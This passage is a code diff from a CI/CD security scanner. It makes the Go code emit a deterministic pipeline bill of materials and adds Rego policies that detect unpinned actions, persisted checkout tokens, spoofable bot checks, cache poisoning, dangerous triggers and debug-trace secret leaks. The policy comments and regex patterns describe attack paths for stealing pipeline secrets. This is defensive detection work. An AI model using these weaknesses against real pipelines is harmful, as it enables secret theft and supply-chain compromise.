Metadata CycloneDXMetadata `json:"metadata"`
Components []CycloneDXComponent `json:"components"`
}
diff --git a/pbom/generate.go b/pbom/generate.go
index da6022f..b76de44 100644
--- a/pbom/generate.go
+++ b/pbom/generate.go
@@ -1,6 +1,7 @@
package pbom
import (
+ "sort"
"time"
"github.com/getplumber/plumber/collector"
@@ -24,12 +25,12 @@ type IncludeOverrideData struct {
// Generator creates PBOMs from pipeline analysis data
type Generator struct {
- projectPath string
- projectID int
- gitlabURL string
- branch string
- complianceData *ImageComplianceData
- includeOverrides *IncludeOverrideData
+ projectPath string
+ projectID int
+ gitlabURL string
+ branch string
+ complianceData *ImageComplianceData
+ includeOverrides *IncludeOverrideData
}
// NewGenerator creates a new PBOM generator
@@ -102,16 +103,23 @@ func (g *Generator) processImages(imageData *collector.GitlabPipelineImageData)
}
}
- // Convert to PBOM format
- images := make([]ContainerImage, 0, len(imageJobMap))
- for link, jobs := range imageJobMap {
+ // Convert to PBOM format in stable order (sorted image link β map iteration is not deterministic).
+ links := make([]string, 0, len(imageJobMap))
+ for link := range imageJobMap {
+ links = append(links, link)
+ }
+ sort.Strings(links)
+
+ images := make([]ContainerImage, 0, len(links))
+ for _, link := range links {
+ jobs := imageJobMap[link]
info := imageInfoMap[link]
img := ContainerImage{
Image: link,
Registry: info.Registry,
Name: info.Name,
Tag: info.Tag,
- Jobs: uniqueStrings(jobs),
+ Jobs: uniqueSortedStrings(jobs),
}
// Enrich with compliance data if available
@@ -221,17 +229,16 @@ func (g *Generator) calculateSummary(pbom *PBOM) Summary {
return summary
}
-// uniqueStrings returns a slice with duplicate strings removed
-func uniqueStrings(input []string) []string {
+// uniqueSortedStrings removes duplicates and sorts for stable PBOM JSON.
+func uniqueSortedStrings(input []string) []string {
seen := make(map[string]struct{})
- result := make([]string, 0, len(input))
-
for _, s := range input {
- if _, exists := seen[s]; !exists {
- seen[s] = struct{}{}
- result = append(result, s)
- }
+ seen[s] = struct{}{}
}
-
- return result
+ out := make([]string, 0, len(seen))
+ for s := range seen {
+ out = append(out, s)
+ }
+ sort.Strings(out)
+ return out
}
diff --git a/pbom/types.go b/pbom/types.go
index df26263..f095ae6 100644
--- a/pbom/types.go
+++ b/pbom/types.go
@@ -17,23 +17,20 @@ const Version = "1.0.0"
// PBOM represents a Pipeline Bill of Materials - an inventory of all
// dependencies used in a CI/CD pipeline.
+// JSON field order follows encode/json struct order: version stamp, project
+// context, aggregate summary, score, then inventories (read top-to-bottom).
type PBOM struct {
- // Metadata
PBOMVersion string `json:"pbomVersion"`
GeneratedAt time.Time `json:"generatedAt"`
- // Project information
Project ProjectInfo `json:"project"`
- // Pipeline dependencies
- ContainerImages []ContainerImage `json:"containerImages"`
- Includes []Include `json:"includes"`
-
- // Summary statistics
Summary Summary `json:"summary"`
- // PlumberScore is optional letter Score (AβE) and numeric Points (0β100); set when analyze uses --score and/or --score-point.
PlumberScore *PlumberScoreSummary `json:"plumberScore,omitempty"`
+
+ ContainerImages []ContainerImage `json:"containerImages"`
+ Includes []Include `json:"includes"`
}
// PlumberScoreSummary mirrors control.PlumberScoreResult for JSON consumers (PBOM / SBOM).
@@ -77,8 +74,8 @@ type ContainerImage struct {
Jobs []string `json:"jobs"`
// Compliance status (from analysis, if available)
- Authorized *bool `json:"authorized,omitempty"`
- ForbiddenTag *bool `json:"forbiddenTag,omitempty"`
+ Authorized *bool `json:"authorized,omitempty"`
+ ForbiddenTag *bool `json:"forbiddenTag,omitempty"`
}
// Include represents an include/component/template used in the pipeline
@@ -105,7 +102,7 @@ type Include struct {
Nested bool `json:"nested,omitempty"`
// Override information (populated from control results)
- Overridden bool `json:"overridden,omitempty"`
+ Overridden bool `json:"overridden,omitempty"`
OverriddenJobs []utils.OverriddenJobDetail `json:"overriddenJobs,omitempty"`
}
diff --git a/policies/action_archived_repo.rego b/policies/action_archived_repo.rego
new file mode 100644
index 0000000..1373f49
--- /dev/null
+++ b/policies/action_archived_repo.rego
@@ -0,0 +1,26 @@
+# action-archived-repo β flag workflow steps that reference an action
+# whose GitHub repository is archived. Archived repos no longer
+# receive maintenance; any existing vulnerability stays open and the
+# project has no path for future security patches.
+#
+# Driven by the collector's API-resolved metadata. When the metadata
+# is missing (gh not authenticated, offline run, non-GitHub action)
+# the policy stays silent: we never raise a finding on the absence of
+# positive evidence.
+package action_archived_repo
+
+import rego.v1
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	action.metadata.repoArchived == true # absent metadata leaves this undefined, so no finding without positive evidence
+	finding := {
+		"code": "ISSUE-108",
+		"severity": "high",
+		"message": sprintf("job %q references %q whose upstream repository is archived β no security patches are coming", [job.name, action.uses]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
diff --git a/policies/action_unpinned.rego b/policies/action_unpinned.rego
new file mode 100644
index 0000000..85123ae
--- /dev/null
+++ b/policies/action_unpinned.rego
@@ -0,0 +1,79 @@
+# action-unpinned β flag GitHub Actions workflow steps whose `uses:`
+# reference is not pinned by a 40-character commit SHA. Tag and branch
+# refs ("v4", "main") are mutable: an attacker who compromises the
+# action's repository can retag them to point at arbitrary code, which
+# then executes inside the caller workflow with its secrets. This is
+# the vector behind the March 2025 tj-actions/changed-files compromise
+# (CVE-2025-30066).
+#
+# Config:
+# input.config.actionsMustBePinnedByCommitSha.enabled = true|false
+#   Master switch, honoured explicitly so `enabled: false` in
+#   .plumber.yaml turns the policy off without deleting the whole
+#   config section (the object itself would still be truthy).
+# input.config.actionsMustBePinnedByCommitSha.trustedOwners = ["actions", "github"]
+#   Owners whose actions are exempt from the pin requirement. Only
+#   owners inside the repository's own trust boundary should be
+#   listed; "actions" and "github" cover the first-party GitHub-
+#   owned actions that any workflow already executes implicitly.
+package action_unpinned
+
+import rego.v1
+
+deny contains finding if {
+	# Gate on the explicit enabled flag rather than mere key presence:
+	# the shipped config is `actionsMustBePinnedByCommitSha: {enabled: true}`,
+	# and a bare truthiness test on the config object would keep the
+	# policy running even after the user sets `enabled: false`.
+	input.config.actionsMustBePinnedByCommitSha.enabled == true
+	some i, j
+	job := input.pipeline.jobs[i]
+	use := job.uses[j]
+	ref := _ref_of(use.uses)
+	not _is_sha(ref)
+	not _is_local(use.uses)
+	not _is_trusted_owner(use.uses)
+	finding := {
+		"code": "ISSUE-104",
+		"severity": "high",
+		"message": sprintf("job %q references action %q with a mutable ref β pin by commit SHA instead", [job.name, use.uses]),
+		"job": job.name,
+		"line": object.get(use, "line", 0),
+	}
+}
+
+# _ref_of returns the substring after "@" in "owner/repo@ref".
+# Returns "" when the string has no "@"; a bare "owner/repo"
+# defaults to the repo's default branch and is treated as
+# unpinned (also a supply-chain risk).
+_ref_of(uses) := ref if {
+	idx := indexof(uses, "@")
+	idx >= 0
+	ref := substring(uses, idx + 1, -1)
+} else := ""
+
+# _is_sha: exactly 40 hex chars (git resolves SHAs case-insensitively).
+_is_sha(ref) if {
+	regex.match(`^[0-9a-fA-F]{40}$`, ref)
+}
+
+# Local actions ("./.github/actions/foo", "./foo") live in the
+# repository itself β no external trust boundary.
+_is_local(uses) if {
+	startswith(uses, "./")
+}
+
+_is_local(uses) if {
+	startswith(uses, "/")
+}
+
+# Docker-image action refs ("docker://gcr.io/β¦") are covered by the
+# container-image policies, not this one.
+_is_local(uses) if {
+	startswith(uses, "docker://")
+}
+
+_is_trusted_owner(uses) if {
+	some trusted in input.config.actionsMustBePinnedByCommitSha.trustedOwners
+	startswith(uses, sprintf("%s/", [trusted]))
+}
diff --git a/policies/anonymous_definition.rego b/policies/anonymous_definition.rego
new file mode 100644
index 0000000..ee6404d
--- /dev/null
+++ b/policies/anonymous_definition.rego
@@ -0,0 +1,35 @@
+# anonymous-definition β flag GitHub Actions workflow files that omit
+# the top-level `name:` field. Without an explicit name, GitHub uses
+# the file path as the display identifier in the Actions UI, PR
+# checks, the required-status-check settings on branch protections,
+# and the audit log. Renaming the file later silently breaks any
+# required-check binding that references the old path, giving the
+# appearance of a passing gate when nothing is actually running.
+#
+# The policy emits once per workflow file (not once per job): the
+# helper below collects originFile values into a set, which dedupes.
+package anonymous_definition
+
+import rego.v1
+
+deny contains finding if {
+	input.pipeline.provider == "github"
+	some file in _anonymous_workflow_files
+	finding := {
+		"code": "ISSUE-601",
+		"severity": "low",
+		"message": sprintf("workflow file %q has no top-level `name:` β GitHub falls back to the file path", [file]),
+		"file": file,
+	}
+}
+
+_anonymous_workflow_files contains file if {
+	# json:",omitempty" drops the field from the serialised IR when
+	# the workflow has no name, so we test for absence with `not`
+	# rather than `== ""`.
+	some i
+	job := input.pipeline.jobs[i]
+	not job.workflowName
+	job.originFile != "" # jobs with no recorded source file cannot be reported per-file
+	file := job.originFile
+}
diff --git a/policies/artipacked.rego b/policies/artipacked.rego
new file mode 100644
index 0000000..09a8edf
--- /dev/null
+++ b/policies/artipacked.rego
@@ -0,0 +1,41 @@
+# artipacked β detect jobs that check out the repository with
+# `actions/checkout` without disabling credential persistence. By
+# default, actions/checkout writes the GITHUB_TOKEN into the cloned
+# repository's .git/config, where it survives for the lifetime of the
+# job. Any later step that uploads `.git` as part of an artifact, or
+# that executes fork-controlled code, can exfiltrate the token. The
+# documented mitigation is a one-liner: `with: persist-credentials:
+# false`.
+#
+# This check pairs with dangerous-triggers (ISSUE-414) and
+# template-injection (ISSUE-206): the persisted credential is
+# precisely what an attacker harvests once they escalate through the
+# trigger / injection path.
+package artipacked
+
+import rego.v1
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	startswith(action.uses, "actions/checkout@") # matches every pinned ref of actions/checkout
+	not _credentials_disabled(action)
+	finding := {
+		"code": "ISSUE-307",
+		"severity": "high",
+		"message": sprintf("job %q runs %q without `persist-credentials: false` β GITHUB_TOKEN lingers in .git/config and is exfiltrable by later steps", [job.name, action.uses]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+# YAML represents `persist-credentials: false` as the boolean false.
+# Accept both forms defensively in case a workflow uses quotes.
+_credentials_disabled(action) if {
+	action.with["persist-credentials"] == false
+}
+
+_credentials_disabled(action) if {
+	action.with["persist-credentials"] == "false"
+}
diff --git a/policies/bot_conditions.rego b/policies/bot_conditions.rego
new file mode 100644
index 0000000..723536e
--- /dev/null
+++ b/policies/bot_conditions.rego
@@ -0,0 +1,51 @@
+# bot-conditions β flag workflows that gate behaviour on a spoofable
+# actor or bot identity check (`github.actor`,
+# `github.triggering_actor`, `github.event.sender.login`, ...). Those
+# fields reflect whoever opened / synchronised the PR, not a verified
+# bot identity. A contributor who registers a GitHub account named
+# `dependabot[bot]` (or uses a fork trick on the right trigger) can
+# satisfy `if: github.actor == 'dependabot[bot]'` and ride through
+# whatever elevated path the workflow gates on it.
+#
+# The policy scans every `if:` expression attached to the job (job-
+# level + each step's) for comparisons against known bot logins or
+# for direct use of the actor/sender fields in an equality check.
+package bot_conditions
+
+import rego.v1
+
+# spoofable_fields are regex fragments for the actor/sender context
+# fields that workflows commonly gate on. The policy fires on ANY
+# equality check against one of these fields; comparing them to a
+# "trusted" login value does not make the check safe.
+spoofable_fields := [
+	`github\.actor`,
+	`github\.triggering_actor`,
+	`github\.event\.sender\.login`,
+	`github\.event\.pusher\.name`,
+	`github\.event\.pull_request\.user\.login`,
+	`github\.event\.head_commit\.author\.name`,
+]
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	cond := job.conditions[j]
+	_has_spoofable_actor_check(cond)
+	finding := {
+		"code": "ISSUE-210",
+		"severity": "high",
+		"message": sprintf("job %q gates on a spoofable actor/bot check β %q cannot be trusted for privileged paths", [job.name, cond]),
+		"job": job.name,
+	}
+}
+
+_has_spoofable_actor_check(cond) if {
+	some field in spoofable_fields
+	regex.match(sprintf(`%s\s*==`, [field]), cond)
+}
+
+_has_spoofable_actor_check(cond) if {
+	some field in spoofable_fields
+	regex.match(sprintf(`==\s*[^!=]*%s`, [field]), cond)
+}
diff --git a/policies/branch_non_compliant.rego b/policies/branch_non_compliant.rego
new file mode 100644
index 0000000..8b560ba
--- /dev/null
+++ b/policies/branch_non_compliant.rego
@@ -0,0 +1,105 @@
+# branch-non-compliant β flag protected branches whose rule settings
+# do not meet the minimum bar set in .plumber.yaml.
+#
+# Only branches that fall under the same policy scope as ISSUE-501
+# (namePatterns match or defaultMustBeProtected + default branch) are
+# evaluated. Other protected branches are ignored so narrowing
+# namePatterns does not leave stray ISSUE-505 on out-of-scope branches.
+#
+# Mirrors controlGitlabProtectionBranchProtectionNotCompliant.go:
+#
+# - allowForcePush must be false (when configured)
+# - codeOwnerApprovalRequired must be true (when configured)
+# - minPushAccessLevel / minMergeAccessLevel: GitLab access levels are
+#   numeric (0 = No one, 30 = Developer, 40 = Maintainer). 0 is the
+#   STRICTEST setting β fewer roles can perform the action. The branch
+#   is flagged when:
+#   * GitLab reported a non-zero level for the branch, AND
+#   * either policy is 0 (must be "No one"), or branch level < policy.
+package branch_non_compliant
+
+import rego.v1
+
+deny contains finding if {
+	some i
+	branch := input.pipeline.branches[i]
+	branch.protected == true
+	_branch_in_protection_scope(branch.name)
+	reasons := [r | r := _non_compliant_reasons[branch.name][_]]
+	count(reasons) > 0
+	finding := {
+		"code": "ISSUE-505",
+		"severity": "high",
+		"message": sprintf("Branch '%s' has non-compliant protection settings", [branch.name]),
+		"job": branch.name,
+		"type": "non_compliant",
+		"branchName": branch.name,
+		"reasons": reasons,
+		"allowForcePush": object.get(branch, "allowForcePush", false),
+		"allowForcePushDisplay": object.get(branch, "allowForcePush", false),
+		"minMergeAccessLevel": object.get(branch, "minMergeAccessLevel", 0),
+		"authorizedMinMergeAccessLevel": object.get(input.config.branchMustBeProtected, "minMergeAccessLevel", 0),
+		"minPushAccessLevel": object.get(branch, "minPushAccessLevel", 0),
+		"authorizedMinPushAccessLevel": object.get(input.config.branchMustBeProtected, "minPushAccessLevel", 0),
+	}
+}
+
+# Same scope as package branch_unprotected: branches the user marked as
+# subject to branch protection policy (not every protected branch in GitLab).
+_branch_in_protection_scope(name) if {
+	cfg := object.get(input.config, "branchMustBeProtected", {})
+	object.get(cfg, "defaultMustBeProtected", false) == true
+	name == input.pipeline.defaultBranch
+}
+
+_branch_in_protection_scope(name) if {
+	cfg := object.get(input.config, "branchMustBeProtected", {})
+	patterns := object.get(cfg, "namePatterns", [])
+	some pattern in patterns
+	glob.match(pattern, null, name)
+}
+
+# Set of human-readable detail lines (one ISSUE-505 groups them under a
+# single headline in the CLI).
+_non_compliant_reasons[branch.name] contains "Force push is allowed (should be disabled)" if {
+	branch := input.pipeline.branches[_]
+	input.config.branchMustBeProtected.allowForcePush == false
+	branch.allowForcePush == true
+}
+
+_non_compliant_reasons[branch.name] contains "Code owner approval is not required" if {
+	branch := input.pipeline.branches[_]
+	input.config.branchMustBeProtected.codeOwnerApprovalRequired == true
+	# IR JSON omits false booleans (omitempty); use object.get so missing reads as false.
+	object.get(branch, "codeOwnerApprovalRequired", false) == false
+}
+
+# Merge access level: legacy guard β only check when GitLab reported a level
+# (cur != 0). Trigger if policy is 0 (must be "No one") or branch < policy.
+_non_compliant_reasons[branch.name] contains reason if {
+	branch := input.pipeline.branches[_]
+	cur := object.get(branch, "minMergeAccessLevel", 0)
+	cur != 0
+	want := object.get(input.config.branchMustBeProtected, "minMergeAccessLevel", 0)
+	_access_level_violates(want, cur)
+	reason := sprintf("Merge access level is too low (%d, minimum: %d)", [cur, want])
+}
+
+# Push access level: same shape, separate reason so one branch can produce both.
+_non_compliant_reasons[branch.name] contains reason if {
+	branch := input.pipeline.branches[_]
+	cur := object.get(branch, "minPushAccessLevel", 0)
+	cur != 0
+	want := object.get(input.config.branchMustBeProtected, "minPushAccessLevel", 0)
+	_access_level_violates(want, cur)
+	reason := sprintf("Push access level is too low (%d, minimum: %d)", [cur, want])
+}
+
+# Policy = 0 ("No one allowed") is the strictest setting; any non-zero branch
+# level is more permissive. ("want", not "min": min is an OPA built-in.)
+_access_level_violates(want, _) if want == 0
+
+_access_level_violates(want, cur) if {
+	want > 0
+	want > cur
+}
diff --git a/policies/branch_unprotected.rego b/policies/branch_unprotected.rego
new file mode 100644
index 0000000..202cabb
--- /dev/null
+++ b/policies/branch_unprotected.rego
@@ -0,0 +1,33 @@
+# branch-unprotected β flag repository branches whose name matches a
+# protection requirement set in .plumber.yaml (either one of the
+# declared namePatterns or the project's default branch when
+# defaultMustBeProtected is on) but for which the provider reports no
+# matching branch-protection rule.
+package branch_unprotected
+
+import rego.v1
+
+deny contains finding if {
+	some i
+	branch := input.pipeline.branches[i]
+	branch.protected == false # Protected has no omitempty in the IR, so false is always present
+	_branch_must_be_protected(branch.name)
+	finding := {
+		"code": "ISSUE-501",
+		"severity": "critical",
+		"message": sprintf("branch %q must be protected", [branch.name]),
+		"job": branch.name,
+		"type": "unprotected",
+		"branchName": branch.name,
+	}
+}
+
+_branch_must_be_protected(name) if {
+	input.config.branchMustBeProtected.defaultMustBeProtected
+	name == input.pipeline.defaultBranch
+}
+
+_branch_must_be_protected(name) if {
+	some pattern in input.config.branchMustBeProtected.namePatterns
+	glob.match(pattern, null, name) # null delimiters: glob over the whole name, no segment splitting
+}
diff --git a/policies/cache_poisoning.rego b/policies/cache_poisoning.rego
new file mode 100644
index 0000000..d45658f
--- /dev/null
+++ b/policies/cache_poisoning.rego
@@ -0,0 +1,107 @@
+# cache-poisoning β flag release / publish jobs that prime a build
+# cache via actions/cache (or the language-specific setup-* action's
+# built-in cache) without an explicit release-scoped key. GitHub
+# Actions caches are shared across branches with permissive fallback:
+# a PR run on a feature branch can populate the same cache key that
+# a later release-triggered job restores, silently injecting
+# compromised artefacts into the published output.
+#
+# "Release context" here is any job whose workflow triggers include
+# `release`, `push` with a tag filter (implicit via the `v*` pattern
+# cache setups commonly key on), `workflow_dispatch` with a release
+# intent, or that references `publish`, `release`, `build-release`
+# semantics in scripts. The collector only surfaces the trigger
+# names so the policy focuses on `release` + `push` triggers β the
+# most common vectors.
+package cache_poisoning
+
+import rego.v1
+
+cache_actions := {
+	"actions/cache",
+	"actions/cache/restore",
+	"gradle/actions/setup-gradle",
+	"actions/setup-node",
+	"actions/setup-go",
+	"actions/setup-python",
+	"actions/setup-java",
+	"pnpm/action-setup",
+}
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	_is_release_context(job)
+	action := job.uses[j]
+	_uses_cache_action(action.uses)
+	not _key_is_release_scoped(action)
+	finding := {
+		"code": "ISSUE-106",
+		"severity": "high",
+		"message": sprintf("job %q restores a cache via %q on a release-type trigger β scope the key to the release ref or disable caching on publish paths", [job.name, action.uses]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+_is_release_context(job) if {
+	some t in job.triggers
+	t == "release"
+}
+
+# Workflows that run a canonical publish action on a job β even under
+# push/workflow_dispatch triggers β are still release-intent. Those
+# actions lift the built artifact out of the runner; a poisoned cache
+# restore before they execute lands straight on the registry.
+_is_release_context(job) if {
+	some k
+	action := job.uses[k]
+	_is_publish_action(action.uses)
+}
+
+publish_actions := {
+	"pypa/gh-action-pypi-publish",
+	"JS-DevTools/npm-publish",
+	"gradle/publish-plugin",
+	"softprops/action-gh-release",
+	"ncipollo/release-action",
+	"goreleaser/goreleaser-action",
+	"crazy-max/ghaction-docker-buildx",
+}
+
+_is_publish_action(uses) if {
+	some prefix in publish_actions
+	startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_is_publish_action(uses) if {
+	some prefix in publish_actions
+	uses == prefix
+}
+
+_uses_cache_action(uses) if {
+	some prefix in cache_actions
+	startswith(uses, sprintf("%s@", [prefix]))
+}
+
+_uses_cache_action(uses) if {
+	some prefix in cache_actions
+	uses == prefix
+}
+
+# A release-scoped key references the ref, tag, or release version:
+# we look for canonical github.ref* / github.event.release.* tokens
+# inside the key string. Deliberately lenient: anything that weaves
+# the ref into the key breaks cross-branch fallback. NOTE(review):
+# setup-* actions take no with.key, so they are always flagged here.
+_key_is_release_scoped(action) if {
+	key := action.with.key
+	is_string(key)
+	regex.match(`github\.(ref(_name)?|sha|event\.release|event\.pull_request\.head\.sha)`, key)
+}
+
+_key_is_release_scoped(action) if {
+	key := action.with.key
+	is_string(key)
+	regex.match(`\$\{\{\s*github\.ref`, key)
+}
diff --git a/policies/component_missing.rego b/policies/component_missing.rego
new file mode 100644
index 0000000..8b75d41
--- /dev/null
+++ b/policies/component_missing.rego
@@ -0,0 +1,61 @@
+# component-missing β flag pipelines that do not include every CI/CD
+# component required by the user's
+# pipelineMustIncludeComponent.requiredGroups policy. The list is in
+# DNF (Disjunctive Normal Form): a group is an AND, the outer slice is
+# an OR. One finding is emitted per missing component per group so the
+# report explains exactly which slot stayed empty β the Go control
+# behaves the same way.
+package component_missing
+
+import rego.v1
+
+deny contains finding if {
+	input.config.pipelineMustIncludeComponent
+	groups := input.config.pipelineMustIncludeComponent.requiredGroups
+	count(groups) > 0
+	not _any_group_satisfied(groups) # DNF: once any AND-group is fully present, emit nothing at all
+	some i, j
+	group := groups[i]
+	required := group[j]
+	not _component_present(required)
+	finding := {
+		"code": "ISSUE-408",
+		"severity": "high",
+		"message": sprintf("required component %q is missing from the pipeline (group %d)", [required, i]),
+		"job": required,
+	}
+}
+
+# A DNF group is satisfied when every required component in it is
+# present. The whole policy is satisfied as soon as ANY group is β
+# that's the OR of the outer slice.
+_any_group_satisfied(groups) if {
+	some i
+	group := groups[i]
+	count(group) > 0
+	every required in group {
+		_component_present(required)
+	}
+}
+
+_component_present(required) if {
+	some k
+	inc := input.pipeline.includes[k]
+	inc.kind == "component"
+	_paths_match(inc, required)
+}
+
+_paths_match(inc, required) if {
+	inc.path != ""
+	inc.path == required
+}
+
+_paths_match(inc, required) if {
+	inc.altPath != ""
+	inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+	inc.source != ""
+	inc.source == required
+}
diff --git a/policies/component_overridden.rego b/policies/component_overridden.rego
new file mode 100644
index 0000000..29ab080
--- /dev/null
+++ b/policies/component_overridden.rego
@@ -0,0 +1,44 @@
+# component-overridden β flag pipelines that import a required CI/CD
+# component but redefine some of its jobs with forbidden CI/CD keys
+# (script, image, rules, β¦). Overriding a required component locally
+# silently defeats the compliance intent: the job name is still there,
+# but its behaviour is no longer the component's behaviour. The match
+# set comes from pipelineMustIncludeComponent.requiredGroups; the
+# overridden-job list is populated by the collector.
+package component_overridden
+
+import rego.v1
+
+deny contains finding if {
+	input.config.pipelineMustIncludeComponent
+	groups := input.config.pipelineMustIncludeComponent.requiredGroups
+	count(groups) > 0
+	some i, j, k
+	group := groups[i]
+	required := group[j]
+	inc := input.pipeline.includes[k]
+	inc.kind == "component"
+	_paths_match(inc, required)
+	count(inc.overriddenJobs) > 0 # populated by the collector (Include.OverriddenJobs)
+	finding := {
+		"code": "ISSUE-409",
+		"severity": "high",
+		"message": sprintf("required component %q is imported but %d of its job(s) are overridden locally", [required, count(inc.overriddenJobs)]),
+		"job": required,
+	}
+}
+
+_paths_match(inc, required) if {
+	inc.path != ""
+	inc.path == required
+}
+
+_paths_match(inc, required) if {
+	inc.altPath != ""
+	inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+	inc.source != ""
+	inc.source == required
+}
diff --git a/policies/container_hardcoded_credentials.rego b/policies/container_hardcoded_credentials.rego
new file mode 100644
index 0000000..10bb475
--- /dev/null
+++ b/policies/container_hardcoded_credentials.rego
@@ -0,0 +1,36 @@
+# container-hardcoded-credentials β flag GitHub Actions job containers
+# whose `credentials.password` is a literal string instead of a
+# `${{ secrets.X }}` reference. A literal password ends up in git
+# history in plain text β anyone with read access to the repository can
+# retrieve it, and rotating means rewriting history on every clone.
+#
+# The collector forwards the raw YAML value of credentials.password on
+# the IR image. Template expressions (`${{ secrets.DOCKER_PASS }}`) pass
+# through as-is β they are recognisable by the surrounding `${{ }}`.
+package container_hardcoded_credentials
+
+import rego.v1
+
+deny contains finding if {
+	some i
+	job := input.pipeline.jobs[i]
+	pw := job.image.credentialsPassword
+	pw != "" # absent/empty password means no inline credentials to assess
+	not _is_expression(pw)
+	finding := {
+		"code": "ISSUE-105",
+		"severity": "critical",
+		"message": sprintf("job %q sets container.credentials.password to a literal value β use ${{ secrets.* }} instead", [job.name]),
+		"job": job.name,
+	}
+}
+
+# _is_expression is true when the password value contains a GitHub
+# Actions template expression. A bare `${{ }}` without an enclosed
+# reference is technically also a literal (it would evaluate to an
+# empty string) but the policy doesn't try to catch that micro-case β
+# the interesting signal is the literal-password footprint.
+_is_expression(value) if {
+	contains(value, "${{")
+	contains(value, "}}")
+}
diff --git a/policies/dangerous_triggers.rego b/policies/dangerous_triggers.rego
new file mode 100644
index 0000000..c3018f7
--- /dev/null
+++ b/policies/dangerous_triggers.rego
@@ -0,0 +1,39 @@
+# dangerous-triggers β flag pipeline jobs reachable through a GitHub
+# Actions trigger that combines attacker-controlled input with
+# privileged secrets. The two primary offenders are:
+#
+# - pull_request_target: runs with the base repo's secrets AND token
+#   while being trivially influenceable by an unprivileged PR author.
+# - workflow_run: triggered by the completion of another workflow,
+#   likewise secret-bearing regardless of the source workflow's
+#   trust boundary.
+#
+# Severity is intentionally "critical". In March 2025 the
+# tj-actions/changed-files compromise (CVE-2025-30066) exploited
+# exactly this pattern β pull_request_target plus an explicit checkout
+# of the PR head β and exfiltrated secrets from hundreds of projects,
+# including aquasecurity/trivy. The finding flags the attack surface
+# whether or not the workflow checks out fork code today: the moment a
+# later edit introduces such a checkout, secrets leak, and the trigger
+# is the prerequisite that makes the pivot possible.
+#
+# Finer-grained risk signals (explicit fork checkout, script injection
+# from `github.event.*`) can be added in follow-up iterations.
+package dangerous_triggers
+
+import rego.v1
+
+dangerous_events := {"pull_request_target", "workflow_run"}
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	trigger := job.triggers[j]
+	dangerous_events[trigger] # set membership: defined only for triggers in the set
+	finding := {
+		"code": "ISSUE-414",
+		"severity": "critical",
+		"message": sprintf("job %q is reachable via the dangerous trigger %q", [job.name, trigger]),
+		"job": job.name,
+	}
+}
diff --git a/policies/debug_trace.rego b/policies/debug_trace.rego
new file mode 100644
index 0000000..23ab34e
--- /dev/null
+++ b/policies/debug_trace.rego
@@ -0,0 +1,60 @@
+# debug-trace β flag pipeline jobs that enable CI debug tracing. When
+# CI_DEBUG_TRACE=true (or the newer CI_DEBUG_SERVICES=true) is set,
+# GitLab Runner prints every environment variable, including masked
+# secrets, to the job log β a well-documented secret-leak path.
+#
+# Parity with the legacy Go control (controlGitlabPipelineDebugTrace.go):
+# - Variable name comparison is case-insensitive.
+# - Truthy values are `true`, `1`, `yes` (case-insensitive, trimmed).
+# - The control is a no-op unless the user populates
+# `pipelineMustNotEnableDebugTrace.forbiddenVariables` in
+# .plumber.yaml β there is no built-in default list. This matches
+# the legacy GetConf path that disables the control when the
+# forbiddenVariables list is empty.
+package debug_trace
+
+import rego.v1
+
+deny contains finding if {
+ count(input.config.debugTrace.forbiddenVariables) > 0
+ some i
+ job := input.pipeline.jobs[i]
+ some var_name in input.config.debugTrace.forbiddenVariables
+ some k, v in job.variables
+ upper(k) == upper(var_name)
+ _is_truthy(v)
+ finding := {
+ "code": "ISSUE-203",
+ "severity": "critical",
+ "message": sprintf("%s = %q (job %q)", [k, v, job.name]),
+ "job": job.name,
+ "variableName": k,
+ "value": v,
+ "location": job.name,
+ }
+}
+
+# Pipeline-level globals (`variables:` at the top of .gitlab-ci.yml)
+# apply to every job, so emit one finding for the pipeline rather than
+# duplicating per job.
+deny contains finding if {
+ count(input.config.debugTrace.forbiddenVariables) > 0
+ some var_name in input.config.debugTrace.forbiddenVariables
+ some k, v in input.pipeline.globalVariables
+ upper(k) == upper(var_name)
+ _is_truthy(v)
+ finding := {
+ "code": "ISSUE-203",
+ "severity": "critical",
+ "message": sprintf("%s = %q (global variables)", [k, v]),
+ "variableName": k,
+ "value": v,
+ "location": "global",
+ }
+}
+
+_is_truthy(v) if lower(trim_space(v)) == "true"
+
+_is_truthy(v) if lower(trim_space(v)) == "1"
+
+_is_truthy(v) if lower(trim_space(v)) == "yes"
diff --git a/policies/dependabot_insecure_exec.rego b/policies/dependabot_insecure_exec.rego
new file mode 100644
index 0000000..5838f9b
--- /dev/null
+++ b/policies/dependabot_insecure_exec.rego
@@ -0,0 +1,25 @@
+# dependabot-insecure-exec β flag repositories whose .github/
+# dependabot.yml sets `insecure-external-code-execution: allow` on
+# any update ecosystem. That toggle lets Dependabot run install /
+# postinstall hooks from arbitrary candidate dependency versions
+# during version resolution, giving any compromised upstream package
+# a direct path into the privileged Dependabot runner.
+#
+# The collector surfaces the list of ecosystems with the toggle set
+# to allow; if that slice is non-empty, we emit one finding per
+# ecosystem so the remediation wording can name which one is wrong.
+package dependabot_insecure_exec
+
+import rego.v1
+
+deny contains finding if {
+	input.pipeline.dependabot
+	some i
+	ecosystem := input.pipeline.dependabot.insecureExecEcosystems[i]
+	finding := {
+		"code": "ISSUE-606",
+		"severity": "critical",
+		"message": sprintf("dependabot ecosystem %q re-enables insecure-external-code-execution — set it back to `deny` or remove the override", [ecosystem]),
+		"file": input.pipeline.dependabot.path,
+	}
+}
diff --git a/policies/dependabot_missing_cooldown.rego b/policies/dependabot_missing_cooldown.rego
new file mode 100644
index 0000000..6aa3f0a
--- /dev/null
+++ b/policies/dependabot_missing_cooldown.rego
@@ -0,0 +1,21 @@
+# dependabot-missing-cooldown β flag update ecosystems in
+# .github/dependabot.yml that have no `cooldown:` window. Without a
+# cooldown, Dependabot opens a PR the instant a new upstream version
+# is published β including the minute-old release that a compromised
+# maintainer just pushed. The security advisory pipeline needs hours
